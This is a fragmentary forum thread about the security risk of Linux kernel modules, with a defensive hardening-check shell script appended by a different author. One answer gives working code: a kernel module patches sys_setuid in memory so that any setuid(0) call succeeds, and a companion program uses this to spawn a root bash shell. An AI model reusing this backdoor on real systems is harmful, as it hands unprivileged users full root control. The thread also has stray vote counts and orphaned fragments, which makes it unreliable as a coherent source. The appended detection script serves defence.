Linux kernel modules - security risk?

How much of a security risk are Linux kernel modules? I remember reading that if someone got access, all they had to do was load a rootkit module. Is that right? Is there a way to protect against this?

What parts of the kernel are actually exposed through the module interface, and what functions are available to programmers that could be used for malicious purposes?

+5
6 answers

As Douglas said, Linux is monolithic, and a module can do anything. This is a design choice, mainly going back to Linus Torvalds, and it fits the Open Source philosophy (why limit it, it costs performance, and you can see what the module does from the source; practically speaking, that only concerns real cretins :-)).

Now, you may have to load some so-called binary modules from third parties. Even if they appear to be compiled, there is usually a regular object file used as a black box, and only the interfaces around it are actually compiled (for example, the nvidia graphics drivers that I use). There is no definite answer: if you load such modules, you must trust the provider; if you don't, do not do it...

  • /proc, /sys, top, ps, lsmod

Rootkit Hunter (http://www.rootkit.nl/projects/rootkit_hunter.html)

+4


+5

Wikipedia


+1


0


    #include <linux/version.h>
    #include <linux/module.h>
    #include <linux/highmem.h>
    #include <asm/unistd.h>

    char *p;

    int init_module(void)   // 0x0ffffffff8107f760 depends on the system; must be taken from the map
    {
        pte_t *pte1;
        unsigned int dummy_but_needed;
        p = (char *)(0xffffffff8107f3a0 + 0x4d); // Got from /boot System.map.xx.xx.xx
        pte1 = lookup_address((unsigned long long)p, &dummy_but_needed);
        pte1->pte |= _PAGE_RW; // Now the code page is writable
        *(p) = (char)0xeb;  // 0xeb is the opcode of the unconditional jmp; we don't care whether we are allowed to get rights. Previously it was the conditional jmp "75".
        return -1;  // insmod complains and the module disappears from the system, but the module did its work already
    }
    MODULE_LICENSE("GPL"); // We don't need cleanup_module


    #include <stdlib.h>
    #include <unistd.h>

    int main(void)
    {
        setuid(0); // Or use asm("mov $0,%rdi; mov $105,%rax; syscall;");
        system("/bin/bash"); // rax = system call nr and rdi = first parameter
        return 0;
    }


Kernel 3.2 AMD64. HW!


    xxxx:/boot$ sudo grep sys_setuid System.map-3.2.0-31-generic
    [sudo] password for xxxx: 
    ffffffff8107f3a0 T sys_setuid
    ffffffff810a23f0 T sys_setuid16


0
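A defender-side check, added here as an example and not code from the thread or from any of its posters, that reports whether the kernel controls which block exactly the attack shown above (a root process loading an arbitrary module) are active: kernel.modules_disabled, module.sig_enforce, the lockdown LSM, and the taint bits that record that a proprietary, out-of-tree or unsigned module has been loaded. The ROOT prefix argument, the function names and the sample tree built in the test are assumptions of this example; the /proc and /sys paths are the real kernel interfaces, and some of them only exist on kernels newer than the 3.2 the answer above was written against, which is why a missing file is reported as "absent" rather than treated as an error.

```shell
#!/bin/sh
# Added example, not code from the thread: report the kernel-side controls that
# decide whether a root process can still load an arbitrary module. ROOT is an
# optional prefix so the same checks can run against a constructed tree; on a
# live system pass "/" (hypothetical usage: sh modcheck.sh /).

# read_knob FILE: print the first token of FILE, or the bracketed word for
# files using the "none [integrity] confidentiality" selection format.
# Prints "absent" if the file does not exist (older kernel or option not built).
read_knob() {
    if [ -r "$1" ]; then
        awk 'NR == 1 {
                 if (match($0, /\[[a-z]+\]/)) print substr($0, RSTART + 1, RLENGTH - 2)
                 else print $1
             }' "$1"
    else
        printf 'absent\n'
    fi
}

# module_hardening_report [ROOT]: print findings; return 0 if unsigned module
# loading is blocked even for root, 1 if it is still possible.
module_hardening_report() {
    root="${1:-}"
    disabled=$(read_knob "$root/proc/sys/kernel/modules_disabled")
    sig=$(read_knob "$root/sys/module/module/parameters/sig_enforce")
    lock=$(read_knob "$root/sys/kernel/security/lockdown")
    taint=$(read_knob "$root/proc/sys/kernel/tainted")
    status=0

    if [ "$disabled" = 1 ]; then
        echo "OK: kernel.modules_disabled=1, no module can be loaded until reboot"
    elif [ "$sig" = Y ]; then
        echo "OK: module.sig_enforce=Y, only modules signed with the kernel's key load"
    elif [ "$lock" = integrity ] || [ "$lock" = confidentiality ]; then
        echo "OK: lockdown=$lock, unsigned modules are rejected"
    else
        echo "WARNING: modules_disabled=$disabled sig_enforce=$sig lockdown=$lock:"
        echo "         any root process can insmod an arbitrary module"
        status=1
    fi

    # Taint bits (Documentation/admin-guide/tainted-kernels): 1 = proprietary
    # module (P), 4096 = out-of-tree module (O), 8192 = unsigned module (E).
    case $taint in *[!0-9]*) taint=0 ;; esac
    [ $((taint & 1)) -ne 0 ]    && echo "NOTE: a proprietary (binary) module has been loaded (P)"
    [ $((taint & 4096)) -ne 0 ] && echo "NOTE: an out-of-tree module has been loaded (O)"
    [ $((taint & 8192)) -ne 0 ] && echo "NOTE: an unsigned module has been loaded (E)"

    # /proc/modules appends each module's own taint flags in parentheses,
    # which lsmod does not show; list the modules that carry any.
    [ -r "$root/proc/modules" ] &&
        awk '/\([A-Z]+\)$/ { print "  tainting module: " $1 " " $NF }' "$root/proc/modules"

    return $status
}

# Run the report when a root prefix is given ("/" for the live system);
# the exit status is non-zero when unsigned module loading is still open.
if [ $# -gt 0 ]; then
    module_hardening_report "${1%/}"
fi
```

The report deliberately treats modules_disabled=1 as sufficient on its own: once set it cannot be cleared without a reboot, so it closes the window the thread describes even on a kernel without signature enforcement. Signature enforcement and lockdown are the finer-grained alternatives when modules still have to be loaded after boot, and the taint bits tell you after the fact whether a binary or unsigned module, such as the nvidia driver mentioned in the first answer, has already been loaded.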
